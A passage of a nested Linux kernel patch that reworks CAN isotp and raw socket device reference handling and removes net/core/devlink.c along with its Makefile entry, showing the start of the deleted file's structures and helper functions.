+-		can_rx_register(net, dev, tx_id, SINGLE_MASK(tx_id),
+-				isotp_rcv_echo, sk, "isotpe", sk);
+-	}
++	/* register for echo skb's */
++	can_rx_register(net, dev, tx_id, SINGLE_MASK(tx_id),
++			isotp_rcv_echo, sk, "isotpe", sk);
+ 
+ 	dev_put(dev);
+ 
+@@ -1521,7 +1513,7 @@ static void isotp_notify(struct isotp_sock *so, unsigned long msg,
+ 	case NETDEV_UNREGISTER:
+ 		lock_sock(sk);
+ 		/* remove current filters & unregister */
+-		if (so->bound && isotp_register_txecho(so)) {
++		if (so->bound) {
+ 			if (isotp_register_rxid(so))
+ 				can_rx_unregister(dev_net(dev), dev, so->rxid,
+ 						  SINGLE_MASK(so->rxid),
+diff --git a/net/can/raw.c b/net/can/raw.c
+index 4abab2c3011a3..8c104339d538d 100644
+--- a/net/can/raw.c
++++ b/net/can/raw.c
+@@ -84,6 +84,8 @@ struct raw_sock {
+ 	struct sock sk;
+ 	int bound;
+ 	int ifindex;
++	struct net_device *dev;
++	netdevice_tracker dev_tracker;
+ 	struct list_head notifier;
+ 	int loopback;
+ 	int recv_own_msgs;
+@@ -277,21 +279,24 @@ static void raw_notify(struct raw_sock *ro, unsigned long msg,
+ 	if (!net_eq(dev_net(dev), sock_net(sk)))
+ 		return;
+ 
+-	if (ro->ifindex != dev->ifindex)
++	if (ro->dev != dev)
+ 		return;
+ 
+ 	switch (msg) {
+ 	case NETDEV_UNREGISTER:
+ 		lock_sock(sk);
+ 		/* remove current filters & unregister */
+-		if (ro->bound)
++		if (ro->bound) {
+ 			raw_disable_allfilters(dev_net(dev), dev, sk);
++			netdev_put(dev, &ro->dev_tracker);
++		}
+ 
+ 		if (ro->count > 1)
+ 			kfree(ro->filter);
+ 
+ 		ro->ifindex = 0;
+ 		ro->bound = 0;
++		ro->dev = NULL;
+ 		ro->count = 0;
+ 		release_sock(sk);
+ 
+@@ -337,6 +342,7 @@ static int raw_init(struct sock *sk)
+ 
+ 	ro->bound            = 0;
+ 	ro->ifindex          = 0;
++	ro->dev              = NULL;
+ 
+ 	/* set default filter to single entry dfilter */
+ 	ro->dfilter.can_id   = 0;
+@@ -383,18 +389,14 @@ static int raw_release(struct socket *sock)
+ 	list_del(&ro->notifier);
+ 	spin_unlock(&raw_notifier_lock);
+ 
++	rtnl_lock();
+ 	lock_sock(sk);
+ 
+ 	/* remove current filters & unregister */
+ 	if (ro->bound) {
+-		if (ro->ifindex) {
+-			struct net_device *dev;
+-
+-			dev = dev_get_by_index(sock_net(sk), ro->ifindex);
+-			if (dev) {
+-				raw_disable_allfilters(dev_net(dev), dev, sk);
+-				dev_put(dev);
+-			}
++		if (ro->dev) {
++			raw_disable_allfilters(dev_net(ro->dev), ro->dev, sk);
++			netdev_put(ro->dev, &ro->dev_tracker);
+ 		} else {
+ 			raw_disable_allfilters(sock_net(sk), NULL, sk);
+ 		}
+@@ -405,6 +407,7 @@ static int raw_release(struct socket *sock)
+ 
+ 	ro->ifindex = 0;
+ 	ro->bound = 0;
++	ro->dev = NULL;
+ 	ro->count = 0;
+ 	free_percpu(ro->uniq);
+ 
+@@ -412,6 +415,8 @@ static int raw_release(struct socket *sock)
+ 	sock->sk = NULL;
+ 
+ 	release_sock(sk);
++	rtnl_unlock();
++
+ 	sock_put(sk);
+ 
+ 	return 0;
+@@ -422,6 +427,7 @@ static int raw_bind(struct socket *sock, struct sockaddr *uaddr, int len)
+ 	struct sockaddr_can *addr = (struct sockaddr_can *)uaddr;
+ 	struct sock *sk = sock->sk;
+ 	struct raw_sock *ro = raw_sk(sk);
++	struct net_device *dev = NULL;
+ 	int ifindex;
+ 	int err = 0;
+ 	int notify_enetdown = 0;
+@@ -431,24 +437,23 @@ static int raw_bind(struct socket *sock, struct sockaddr *uaddr, int len)
+ 	if (addr->can_family != AF_CAN)
+ 		return -EINVAL;
+ 
++	rtnl_lock();
+ 	lock_sock(sk);
+ 
+ 	if (ro->bound && addr->can_ifindex == ro->ifindex)
+ 		goto out;
+ 
+ 	if (addr->can_ifindex) {
+-		struct net_device *dev;
+-
+ 		dev = dev_get_by_index(sock_net(sk), addr->can_ifindex);
+ 		if (!dev) {
+ 			err = -ENODEV;
+ 			goto out;
+ 		}
+ 		if (dev->type != ARPHRD_CAN) {
+-			dev_put(dev);
+ 			err = -ENODEV;
+-			goto out;
++			goto out_put_dev;
+ 		}
++
+ 		if (!(dev->flags & IFF_UP))
+ 			notify_enetdown = 1;
+ 
+@@ -456,7 +461,9 @@ static int raw_bind(struct socket *sock, struct sockaddr *uaddr, int len)
+ 
+ 		/* filters set by default/setsockopt */
+ 		err = raw_enable_allfilters(sock_net(sk), dev, sk);
+-		dev_put(dev);
++		if (err)
++			goto out_put_dev;
++
+ 	} else {
+ 		ifindex = 0;
+ 
+@@ -467,26 +474,30 @@ static int raw_bind(struct socket *sock, struct sockaddr *uaddr, int len)
+ 	if (!err) {
+ 		if (ro->bound) {
+ 			/* unregister old filters */
+-			if (ro->ifindex) {
+-				struct net_device *dev;
+-
+-				dev = dev_get_by_index(sock_net(sk),
+-						       ro->ifindex);
+-				if (dev) {
+-					raw_disable_allfilters(dev_net(dev),
+-							       dev, sk);
+-					dev_put(dev);
+-				}
++			if (ro->dev) {
++				raw_disable_allfilters(dev_net(ro->dev),
++						       ro->dev, sk);
++				/* drop reference to old ro->dev */
++				netdev_put(ro->dev, &ro->dev_tracker);
+ 			} else {
+ 				raw_disable_allfilters(sock_net(sk), NULL, sk);
+ 			}
+ 		}
+ 		ro->ifindex = ifindex;
+ 		ro->bound = 1;
++		/* bind() ok -> hold a reference for new ro->dev */
++		ro->dev = dev;
++		if (ro->dev)
++			netdev_hold(ro->dev, &ro->dev_tracker, GFP_KERNEL);
+ 	}
+ 
+- out:
++out_put_dev:
++	/* remove potential reference from dev_get_by_index() */
++	if (dev)
++		dev_put(dev);
++out:
+ 	release_sock(sk);
++	rtnl_unlock();
+ 
+ 	if (notify_enetdown) {
+ 		sk->sk_err = ENETDOWN;
+@@ -552,9 +563,9 @@ static int raw_setsockopt(struct socket *sock, int level, int optname,
+ 		rtnl_lock();
+ 		lock_sock(sk);
+ 
+-		if (ro->bound && ro->ifindex) {
+-			dev = dev_get_by_index(sock_net(sk), ro->ifindex);
+-			if (!dev) {
++		dev = ro->dev;
++		if (ro->bound && dev) {
++			if (dev->reg_state != NETREG_REGISTERED) {
+ 				if (count > 1)
+ 					kfree(filter);
+ 				err = -ENODEV;
+@@ -595,7 +606,6 @@ static int raw_setsockopt(struct socket *sock, int level, int optname,
+ 		ro->count  = count;
+ 
+  out_fil:
+-		dev_put(dev);
+ 		release_sock(sk);
+ 		rtnl_unlock();
+ 
+@@ -613,9 +623,9 @@ static int raw_setsockopt(struct socket *sock, int level, int optname,
+ 		rtnl_lock();
+ 		lock_sock(sk);
+ 
+-		if (ro->bound && ro->ifindex) {
+-			dev = dev_get_by_index(sock_net(sk), ro->ifindex);
+-			if (!dev) {
++		dev = ro->dev;
++		if (ro->bound && dev) {
++			if (dev->reg_state != NETREG_REGISTERED) {
+ 				err = -ENODEV;
+ 				goto out_err;
+ 			}
+@@ -639,7 +649,6 @@ static int raw_setsockopt(struct socket *sock, int level, int optname,
+ 		ro->err_mask = err_mask;
+ 
+  out_err:
+-		dev_put(dev);
+ 		release_sock(sk);
+ 		rtnl_unlock();
+ 
+diff --git a/net/core/Makefile b/net/core/Makefile
+index 5857cec87b839..10edd66a8a372 100644
+--- a/net/core/Makefile
++++ b/net/core/Makefile
+@@ -33,7 +33,6 @@ obj-$(CONFIG_LWTUNNEL) += lwtunnel.o
+ obj-$(CONFIG_LWTUNNEL_BPF) += lwt_bpf.o
+ obj-$(CONFIG_DST_CACHE) += dst_cache.o
+ obj-$(CONFIG_HWBM) += hwbm.o
+-obj-$(CONFIG_NET_DEVLINK) += devlink.o
+ obj-$(CONFIG_GRO_CELLS) += gro_cells.o
+ obj-$(CONFIG_FAILOVER) += failover.o
+ obj-$(CONFIG_NET_SOCK_MSG) += skmsg.o
+diff --git a/net/core/devlink.c b/net/core/devlink.c
+deleted file mode 100644
+index 5a4a4b34ac15c..0000000000000
+--- a/net/core/devlink.c
++++ /dev/null
+@@ -1,12547 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- * net/core/devlink.c - Network physical/parent device Netlink interface
+- *
+- * Heavily inspired by net/wireless/
+- * Copyright (c) 2016 Mellanox Technologies. All rights reserved.
+- * Copyright (c) 2016 Jiri Pirko <jiri@mellanox.com>
+- */
+-
+-#include <linux/etherdevice.h>
+-#include <linux/kernel.h>
+-#include <linux/module.h>
+-#include <linux/types.h>
+-#include <linux/slab.h>
+-#include <linux/gfp.h>
+-#include <linux/device.h>
+-#include <linux/list.h>
+-#include <linux/netdevice.h>
+-#include <linux/spinlock.h>
+-#include <linux/refcount.h>
+-#include <linux/workqueue.h>
+-#include <linux/u64_stats_sync.h>
+-#include <linux/timekeeping.h>
+-#include <rdma/ib_verbs.h>
+-#include <net/netlink.h>
+-#include <net/genetlink.h>
+-#include <net/rtnetlink.h>
+-#include <net/net_namespace.h>
+-#include <net/sock.h>
+-#include <net/devlink.h>
+-#define CREATE_TRACE_POINTS
+-#include <trace/events/devlink.h>
+-
+-#define DEVLINK_RELOAD_STATS_ARRAY_SIZE \
+-	(__DEVLINK_RELOAD_LIMIT_MAX * __DEVLINK_RELOAD_ACTION_MAX)
+-
+-struct devlink_dev_stats {
+-	u32 reload_stats[DEVLINK_RELOAD_STATS_ARRAY_SIZE];
+-	u32 remote_reload_stats[DEVLINK_RELOAD_STATS_ARRAY_SIZE];
+-};
+-
+-struct devlink {
+-	u32 index;
+-	struct list_head port_list;
+-	struct list_head rate_list;
+-	struct list_head sb_list;
+-	struct list_head dpipe_table_list;
+-	struct list_head resource_list;
+-	struct list_head param_list;
+-	struct list_head region_list;
+-	struct list_head reporter_list;
+-	struct mutex reporters_lock; /* protects reporter_list */
+-	struct devlink_dpipe_headers *dpipe_headers;
+-	struct list_head trap_list;
+-	struct list_head trap_group_list;
+-	struct list_head trap_policer_list;
+-	struct list_head linecard_list;
+-	struct mutex linecards_lock; /* protects linecard_list */
+-	const struct devlink_ops *ops;
+-	u64 features;
+-	struct xarray snapshot_ids;
+-	struct devlink_dev_stats stats;
+-	struct device *dev;
+-	possible_net_t _net;
+-	/* Serializes access to devlink instance specific objects such as
+-	 * port, sb, dpipe, resource, params, region, traps and more.
+-	 */
+-	struct mutex lock;
+-	struct lock_class_key lock_key;
+-	u8 reload_failed:1;
+-	refcount_t refcount;
+-	struct completion comp;
+-	struct rcu_head rcu;
+-	char priv[] __aligned(NETDEV_ALIGN);
+-};
+-
+-struct devlink_linecard_ops;
+-struct devlink_linecard_type;
+-
+-struct devlink_linecard {
+-	struct list_head list;
+-	struct devlink *devlink;
+-	unsigned int index;
+-	refcount_t refcount;
+-	const struct devlink_linecard_ops *ops;
+-	void *priv;
+-	enum devlink_linecard_state state;
+-	struct mutex state_lock; /* Protects state */
+-	const char *type;
+-	struct devlink_linecard_type *types;
+-	unsigned int types_count;
+-	struct devlink *nested_devlink;
+-};
+-
+-/**
+- * struct devlink_resource - devlink resource
+- * @name: name of the resource
+- * @id: id, per devlink instance
+- * @size: size of the resource
+- * @size_new: updated size of the resource, reload is needed
+- * @size_valid: valid in case the total size of the resource is valid
+- *              including its children
+- * @parent: parent resource
+- * @size_params: size parameters
+- * @list: parent list
+- * @resource_list: list of child resources
+- * @occ_get: occupancy getter callback
+- * @occ_get_priv: occupancy getter callback priv
+- */
+-struct devlink_resource {
+-	const char *name;
+-	u64 id;
+-	u64 size;
+-	u64 size_new;
+-	bool size_valid;
+-	struct devlink_resource *parent;
+-	struct devlink_resource_size_params size_params;
+-	struct list_head list;
+-	struct list_head resource_list;
+-	devlink_resource_occ_get_t *occ_get;
+-	void *occ_get_priv;
+-};
+-
+-void *devlink_priv(struct devlink *devlink)
+-{
+-	return &devlink->priv;
+-}
+-EXPORT_SYMBOL_GPL(devlink_priv);
+-
+-struct devlink *priv_to_devlink(void *priv)
+-{
+-	return container_of(priv, struct devlink, priv);
+-}
+-EXPORT_SYMBOL_GPL(priv_to_devlink);
+-
+-struct device *devlink_to_dev(const struct devlink *devlink)
+-{
+-	return devlink->dev;
+-}
+-EXPORT_SYMBOL_GPL(devlink_to_dev);
+-
+-static struct devlink_dpipe_field devlink_dpipe_fields_ethernet[] = {
+-	{
+-		.name = "destination mac",
+-		.id = DEVLINK_DPIPE_FIELD_ETHERNET_DST_MAC,
+-		.bitwidth = 48,
+-	},
+-};
+-
+-struct devlink_dpipe_header devlink_dpipe_header_ethernet = {
+-	.name = "ethernet",
+-	.id = DEVLINK_DPIPE_HEADER_ETHERNET,
+-	.fields = devlink_dpipe_fields_ethernet,
+-	.fields_count = ARRAY_SIZE(devlink_dpipe_fields_ethernet),
+-	.global = true,
+-};
+-EXPORT_SYMBOL_GPL(devlink_dpipe_header_ethernet);
+-
+-static struct devlink_dpipe_field devlink_dpipe_fields_ipv4[] = {
+-	{
+-		.name = "destination ip",
+-		.id = DEVLINK_DPIPE_FIELD_IPV4_DST_IP,
+-		.bitwidth = 32,
+-	},
+-};
+-
+-struct devlink_dpipe_header devlink_dpipe_header_ipv4 = {
+-	.name = "ipv4",
+-	.id = DEVLINK_DPIPE_HEADER_IPV4,
+-	.fields = devlink_dpipe_fields_ipv4,
+-	.fields_count = ARRAY_SIZE(devlink_dpipe_fields_ipv4),
+-	.global = true,
+-};
+-EXPORT_SYMBOL_GPL(devlink_dpipe_header_ipv4);
+-
+-static struct devlink_dpipe_field devlink_dpipe_fields_ipv6[] = {
+-	{
+-		.name = "destination ip",
+-		.id = DEVLINK_DPIPE_FIELD_IPV6_DST_IP,
+-		.bitwidth = 128,
+-	},
+-};
+-
+-struct devlink_dpipe_header devlink_dpipe_header_ipv6 = {
+-	.name = "ipv6",
+-	.id = DEVLINK_DPIPE_HEADER_IPV6,
+-	.fields = devlink_dpipe_fields_ipv6,
+-	.fields_count = ARRAY_SIZE(devlink_dpipe_fields_ipv6),
+-	.global = true,
+-};
+-EXPORT_SYMBOL_GPL(devlink_dpipe_header_ipv6);
+-
+-EXPORT_TRACEPOINT_SYMBOL_GPL(devlink_hwmsg);
+-EXPORT_TRACEPOINT_SYMBOL_GPL(devlink_hwerr);
+-EXPORT_TRACEPOINT_SYMBOL_GPL(devlink_trap_report);
+-
+-static const struct nla_policy devlink_function_nl_policy[DEVLINK_PORT_FUNCTION_ATTR_MAX + 1] = {
+-	[DEVLINK_PORT_FUNCTION_ATTR_HW_ADDR] = { .type = NLA_BINARY },
+-	[DEVLINK_PORT_FN_ATTR_STATE] =
+-		NLA_POLICY_RANGE(NLA_U8, DEVLINK_PORT_FN_STATE_INACTIVE,
+-				 DEVLINK_PORT_FN_STATE_ACTIVE),
+-};
+-
+-static const struct nla_policy devlink_selftest_nl_policy[DEVLINK_ATTR_SELFTEST_ID_MAX + 1] = {
+-	[DEVLINK_ATTR_SELFTEST_ID_FLASH] = { .type = NLA_FLAG },
+-};
+-
+-static DEFINE_XARRAY_FLAGS(devlinks, XA_FLAGS_ALLOC);
+-#define DEVLINK_REGISTERED XA_MARK_1
+-#define DEVLINK_UNREGISTERING XA_MARK_2
+-
+-/* devlink instances are open to the access from the user space after
+- * devlink_register() call. Such logical barrier allows us to have certain
+- * expectations related to locking.
+- *
+- * Before *_register() - we are in initialization stage and no parallel
+- * access possible to the devlink instance. All drivers perform that phase
+- * by implicitly holding device_lock.
+- *
+- * After *_register() - users and driver can access devlink instance at
+- * the same time.
+- */
+-#define ASSERT_DEVLINK_REGISTERED(d)                                           \
+-	WARN_ON_ONCE(!xa_get_mark(&devlinks, (d)->index, DEVLINK_REGISTERED))
+-#define ASSERT_DEVLINK_NOT_REGISTERED(d)                                       \
+-	WARN_ON_ONCE(xa_get_mark(&devlinks, (d)->index, DEVLINK_REGISTERED))
+-
+-struct net *devlink_net(const struct devlink *devlink)
+-{
+-	return read_pnet(&devlink->_net);
+-}
+-EXPORT_SYMBOL_GPL(devlink_net);
+-
+-static void __devlink_put_rcu(struct rcu_head *head)
+-{
+-	struct devlink *devlink = container_of(head, struct devlink, rcu);
+-
+-	complete(&devlink->comp);
+-}
+-
+-void devlink_put(struct devlink *devlink)
+-{
+-	if (refcount_dec_and_test(&devlink->refcount))
+-		/* Make sure unregister operation that may await the completion
+-		 * is unblocked only after all users are after the end of
+-		 * RCU grace period.
+-		 */
+-		call_rcu(&devlink->rcu, __devlink_put_rcu);
+-}
+-
+-struct devlink *__must_check devlink_try_get(struct devlink *devlink)
+-{
+-	if (refcount_inc_not_zero(&devlink->refcount))
+-		return devlink;
+-	return NULL;
+-}
+-
+-void devl_assert_locked(struct devlink *devlink)
+-{
+-	lockdep_assert_held(&devlink->lock);
+-}
+-EXPORT_SYMBOL_GPL(devl_assert_locked);
+-
+-#ifdef CONFIG_LOCKDEP
+-/* For use in conjunction with LOCKDEP only e.g. rcu_dereference_protected() */
+-bool devl_lock_is_held(struct devlink *devlink)
+-{
+-	return lockdep_is_held(&devlink->lock);
+-}
+-EXPORT_SYMBOL_GPL(devl_lock_is_held);
+-#endif
+-
+-void devl_lock(struct devlink *devlink)
+-{
+-	mutex_lock(&devlink->lock);
+-}
+-EXPORT_SYMBOL_GPL(devl_lock);
+-
+-int devl_trylock(struct devlink *devlink)
+-{
+-	return mutex_trylock(&devlink->lock);
+-}
+-EXPORT_SYMBOL_GPL(devl_trylock);
+-
+-void devl_unlock(struct devlink *devlink)
+-{
+-	mutex_unlock(&devlink->lock);
+-}
+-EXPORT_SYMBOL_GPL(devl_unlock);
+-
+-static struct devlink *
+-devlinks_xa_find_get(struct net *net, unsigned long *indexp, xa_mark_t filter,
+-		     void * (*xa_find_fn)(struct xarray *, unsigned long *,
+-					  unsigned long, xa_mark_t))
+-{
+-	struct devlink *devlink;
+-
+-	rcu_read_lock();
+-retry:
+-	devlink = xa_find_fn(&devlinks, indexp, ULONG_MAX, DEVLINK_REGISTERED);
+-	if (!devlink)
+-		goto unlock;
+-
+-	/* In case devlink_unregister() was already called and "unregistering"
+-	 * mark was set, do not allow to get a devlink reference here.
+-	 * This prevents live-lock of devlink_unregister() wait for completion.
+-	 */
+-	if (xa_get_mark(&devlinks, *indexp, DEVLINK_UNREGISTERING))
+-		goto retry;
+-
+-	/* For a possible retry, the xa_find_after() should be always used */
+-	xa_find_fn = xa_find_after;
+-	if (!devlink_try_get(devlink))
+-		goto retry;
+-	if (!net_eq(devlink_net(devlink), net)) {
+-		devlink_put(devlink);
+-		goto retry;
+-	}
+-unlock:
+-	rcu_read_unlock();
+-	return devlink;
+-}
+-
+-static struct devlink *devlinks_xa_find_get_first(struct net *net,
+-						  unsigned long *indexp,
+-						  xa_mark_t filter)
+-{
+-	return devlinks_xa_find_get(net, indexp, filter, xa_find);
+-}
+-
+-static struct devlink *devlinks_xa_find_get_next(struct net *net,
+-						 unsigned long *indexp,
+-						 xa_mark_t filter)
+-{
+-	return devlinks_xa_find_get(net, indexp, filter, xa_find_after);
+-}
+-
+-/* Iterate over devlink pointers which were possible to get reference to.
+- * devlink_put() needs to be called for each iterated devlink pointer
+- * in loop body in order to release the reference.
+- */
+-#define devlinks_xa_for_each_get(net, index, devlink, filter)			\
+-	for (index = 0,								\
+-	     devlink = devlinks_xa_find_get_first(net, &index, filter);		\
+-	     devlink; devlink = devlinks_xa_find_get_next(net, &index, filter))
+-
+-#define devlinks_xa_for_each_registered_get(net, index, devlink)		\
+-	devlinks_xa_for_each_get(net, index, devlink, DEVLINK_REGISTERED)
+-
+-static struct devlink *devlink_get_from_attrs(struct net *net,
+-					      struct nlattr **attrs)
+-{
+-	struct devlink *devlink;
+-	unsigned long index;
+-	char *busname;
+-	char *devname;
+-
+-	if (!attrs[DEVLINK_ATTR_BUS_NAME] || !attrs[DEVLINK_ATTR_DEV_NAME])
+-		return ERR_PTR(-EINVAL);
+-
+-	busname = nla_data(attrs[DEVLINK_ATTR_BUS_NAME]);
+-	devname = nla_data(attrs[DEVLINK_ATTR_DEV_NAME]);
+-
+-	devlinks_xa_for_each_registered_get(net, index, devlink) {
+-		if (strcmp(devlink->dev->bus->name, busname) == 0 &&
+-		    strcmp(dev_name(devlink->dev), devname) == 0)
+-			return devlink;
+-		devlink_put(devlink);
+-	}
+-
+-	return ERR_PTR(-ENODEV);
+-}
+-
+-#define ASSERT_DEVLINK_PORT_REGISTERED(devlink_port)				\
+-	WARN_ON_ONCE(!(devlink_port)->registered)
+-#define ASSERT_DEVLINK_PORT_NOT_REGISTERED(devlink_port)			\
+-	WARN_ON_ONCE((devlink_port)->registered)
+-#define ASSERT_DEVLINK_PORT_INITIALIZED(devlink_port)				\
+-	WARN_ON_ONCE(!(devlink_port)->initialized)
+-
+-static struct devlink_port *devlink_port_get_by_index(struct devlink *devlink,
+-						      unsigned int port_index)
+-{
+-	struct devlink_port *devlink_port;
+-
+-	list_for_each_entry(devlink_port, &devlink->port_list, list) {
+-		if (devlink_port->index == port_index)
+-			return devlink_port;
+-	}
+-	return NULL;
+-}
+-
+-static bool devlink_port_index_exists(struct devlink *devlink,
+-				      unsigned int port_index)
+-{
+-	return devlink_port_get_by_index(devlink, port_index);
+-}
+-
+-static struct devlink_port *devlink_port_get_from_attrs(struct devlink *devlink,
+-							struct nlattr **attrs)
+-{
+-	if (attrs[DEVLINK_ATTR_PORT_INDEX]) {
+-		u32 port_index = nla_get_u32(attrs[DEVLINK_ATTR_PORT_INDEX]);
+-		struct devlink_port *devlink_port;
+-
+-		devlink_port = devlink_port_get_by_index(devlink, port_index);
+-		if (!devlink_port)
+-			return ERR_PTR(-ENODEV);
+-		return devlink_port;
+-	}
+-	return ERR_PTR(-EINVAL);
+-}
+-
+-static struct devlink_port *devlink_port_get_from_info(struct devlink *devlink,
+-						       struct genl_info *info)
+-{
+-	return devlink_port_get_from_attrs(devlink, info->attrs);
+-}
+-
+-static inline bool
+-devlink_rate_is_leaf(struct devlink_rate *devlink_rate)
+-{
+-	return devlink_rate->type == DEVLINK_RATE_TYPE_LEAF;
+-}
+-
+-static inline bool
+-devlink_rate_is_node(struct devlink_rate *devlink_rate)
+-{
+-	return devlink_rate->type == DEVLINK_RATE_TYPE_NODE;
+-}
+-
+-static struct devlink_rate *
+-devlink_rate_leaf_get_from_info(struct devlink *devlink, struct genl_info *info)
+-{
+-	struct devlink_rate *devlink_rate;
+-	struct devlink_port *devlink_port;
+-
+-	devlink_port = devlink_port_get_from_attrs(devlink, info->attrs);
+-	if (IS_ERR(devlink_port))
+-		return ERR_CAST(devlink_port);
+-	devlink_rate = devlink_port->devlink_rate;
+-	return devlink_rate ?: ERR_PTR(-ENODEV);
+-}
+-
+-static struct devlink_rate *
+-devlink_rate_node_get_by_name(struct devlink *devlink, const char *node_name)
+-{
+-	static struct devlink_rate *devlink_rate;
+-
+-	list_for_each_entry(devlink_rate, &devlink->rate_list, list) {
+-		if (devlink_rate_is_node(devlink_rate) &&
+-		    !strcmp(node_name, devlink_rate->name))
+-			return devlink_rate;
+-	}
+-	return ERR_PTR(-ENODEV);
+-}
+-
+-static struct devlink_rate *
+-devlink_rate_node_get_from_attrs(struct devlink *devlink, struct nlattr **attrs)
+-{
+-	const char *rate_node_name;
+-	size_t len;
+-
+-	if (!attrs[DEVLINK_ATTR_RATE_NODE_NAME])
+-		return ERR_PTR(-EINVAL);
+-	rate_node_name = nla_data(attrs[DEVLINK_ATTR_RATE_NODE_NAME]);
+-	len = strlen(rate_node_name);
+-	/* Name cannot be empty or decimal number */
+-	if (!len || strspn(rate_node_name, "0123456789") == len)
+-		return ERR_PTR(-EINVAL);
+-
+-	return devlink_rate_node_get_by_name(devlink, rate_node_name);
+-}
+-
+-static struct devlink_rate *
+-devlink_rate_node_get_from_info(struct devlink *devlink, struct genl_info *info)
+-{
+-	return devlink_rate_node_get_from_attrs(devlink, info->attrs);
+-}
+-
+-static struct devlink_rate *
+-devlink_rate_get_from_info(struct devlink *devlink, struct genl_info *info)
+-{
+-	struct nlattr **attrs = info->attrs;
+-
+-	if (attrs[DEVLINK_ATTR_PORT_INDEX])
+-		return devlink_rate_leaf_get_from_info(devlink, info);
+-	else if (attrs[DEVLINK_ATTR_RATE_NODE_NAME])
+-		return devlink_rate_node_get_from_info(devlink, info);
+-	else
+-		return ERR_PTR(-EINVAL);
+-}
+-
+-static struct devlink_linecard *
+-devlink_linecard_get_by_index(struct devlink *devlink,
+-			      unsigned int linecard_index)
+-{
+-	struct devlink_linecard *devlink_linecard;
+-
+-	list_for_each_entry(devlink_linecard, &devlink->linecard_list, list) {
+-		if (devlink_linecard->index == linecard_index)
+-			return devlink_linecard;
+-	}
+-	return NULL;
+-}
+-
+-static bool devlink_linecard_index_exists(struct devlink *devlink,
+-					  unsigned int linecard_index)
+-{
+-	return devlink_linecard_get_by_index(devlink, linecard_index);
+-}
+-
+-static struct devlink_linecard *
+-devlink_linecard_get_from_attrs(struct devlink *devlink, struct nlattr **attrs)
+-{
+-	if (attrs[DEVLINK_ATTR_LINECARD_INDEX]) {
+-		u32 linecard_index = nla_get_u32(attrs[DEVLINK_ATTR_LINECARD_INDEX]);
+-		struct devlink_linecard *linecard;
+-
+-		mutex_lock(&devlink->linecards_lock);
+-		linecard = devlink_linecard_get_by_index(devlink, linecard_index);
+-		if (linecard)
+-			refcount_inc(&linecard->refcount);
+-		mutex_unlock(&devlink->linecards_lock);
+-		if (!linecard)
+-			return ERR_PTR(-ENODEV);
+-		return linecard;
+-	}
+-	return ERR_PTR(-EINVAL);
+-}
+-
+-static struct devlink_linecard *
+-devlink_linecard_get_from_info(struct devlink *devlink, struct genl_info *info)
+-{
+-	return devlink_linecard_get_from_attrs(devlink, info->attrs);
+-}
+-
+-static void devlink_linecard_put(struct devlink_linecard *linecard)
+-{
+-	if (refcount_dec_and_test(&linecard->refcount)) {
+-		mutex_destroy(&linecard->state_lock);
+-		kfree(linecard);
+-	}
+-}
+-
+-struct devlink_sb {
+-	struct list_head list;
+-	unsigned int index;
+-	u32 size;
+-	u16 ingress_pools_count;
+-	u16 egress_pools_count;
+-	u16 ingress_tc_count;
+-	u16 egress_tc_count;
+-};
+-
+-static u16 devlink_sb_pool_count(struct devlink_sb *devlink_sb)
+-{
+-	return devlink_sb->ingress_pools_count + devlink_sb->egress_pools_count;
+-}
+-
+-static struct devlink_sb *devlink_sb_get_by_index(struct devlink *devlink,
+-						  unsigned int sb_index)
+-{
+-	struct devlink_sb *devlink_sb;
+-
+-	list_for_each_entry(devlink_sb, &devlink->sb_list, list) {
+-		if (devlink_sb->index == sb_index)
+-			return devlink_sb;
+-	}
+-	return NULL;
+-}
+-
+-static bool devlink_sb_index_exists(struct devlink *devlink,
+-				    unsigned int sb_index)
+-{
+-	return devlink_sb_get_by_index(devlink, sb_index);
+-}
+-
+-static struct devlink_sb *devlink_sb_get_from_attrs(struct devlink *devlink,
+-						    struct nlattr **attrs)
+-{
+-	if (attrs[DEVLINK_ATTR_SB_INDEX]) {
+-		u32 sb_index = nla_get_u32(attrs[DEVLINK_ATTR_SB_INDEX]);
+-		struct devlink_sb *devlink_sb;
+-
+-		devlink_sb = devlink_sb_get_by_index(devlink, sb_index);
+-		if (!devlink_sb)
+-			return ERR_PTR(-ENODEV);
+-		return devlink_sb;
+-	}
+-	return ERR_PTR(-EINVAL);
+-}
+-
+-static struct devlink_sb *devlink_sb_get_from_info(struct devlink *devlink,
+-						   struct genl_info *info)
+-{
+-	return devlink_sb_get_from_attrs(devlink, info->attrs);
+-}
+-
+-static int devlink_sb_pool_index_get_from_attrs(struct devlink_sb *devlink_sb,
+-						struct nlattr **attrs,
+-						u16 *p_pool_index)
+-{
+-	u16 val;
+-
+-	if (!attrs[DEVLINK_ATTR_SB_POOL_INDEX])
+-		return -EINVAL;
+-
+-	val = nla_get_u16(attrs[DEVLINK_ATTR_SB_POOL_INDEX]);
+-	if (val >= devlink_sb_pool_count(devlink_sb))
+-		return -EINVAL;
+-	*p_pool_index = val;
+-	return 0;
+-}
+-
+-static int devlink_sb_pool_index_get_from_info(struct devlink_sb *devlink_sb,
+-					       struct genl_info *info,
+-					       u16 *p_pool_index)
+-{
+-	return devlink_sb_pool_index_get_from_attrs(devlink_sb, info->attrs,
+-						    p_pool_index);
+-}
+-
+-static int
+-devlink_sb_pool_type_get_from_attrs(struct nlattr **attrs,
+-				    enum devlink_sb_pool_type *p_pool_type)
+-{
+-	u8 val;
+-
+-	if (!attrs[DEVLINK_ATTR_SB_POOL_TYPE])
+-		return -EINVAL;
+-
+-	val = nla_get_u8(attrs[DEVLINK_ATTR_SB_POOL_TYPE]);
+-	if (val != DEVLINK_SB_POOL_TYPE_INGRESS &&
+-	    val != DEVLINK_SB_POOL_TYPE_EGRESS)
+-		return -EINVAL;
+-	*p_pool_type = val;
+-	return 0;
+-}
+-
+-static int
+-devlink_sb_pool_type_get_from_info(struct genl_info *info,
+-				   enum devlink_sb_pool_type *p_pool_type)
+-{
+-	return devlink_sb_pool_type_get_from_attrs(info->attrs, p_pool_type);
+-}
+-
+-static int
+-devlink_sb_th_type_get_from_attrs(struct nlattr **attrs,
+-				  enum devlink_sb_threshold_type *p_th_type)
+-{
+-	u8 val;
+-
+-	if (!attrs[DEVLINK_ATTR_SB_POOL_THRESHOLD_TYPE])
+-		return -EINVAL;
+-
+-	val = nla_get_u8(attrs[DEVLINK_ATTR_SB_POOL_THRESHOLD_TYPE]);
+-	if (val != DEVLINK_SB_THRESHOLD_TYPE_STATIC &&
+-	    val != DEVLINK_SB_THRESHOLD_TYPE_DYNAMIC)
+-		return -EINVAL;
+-	*p_th_type = val;
+-	return 0;
+-}
+-
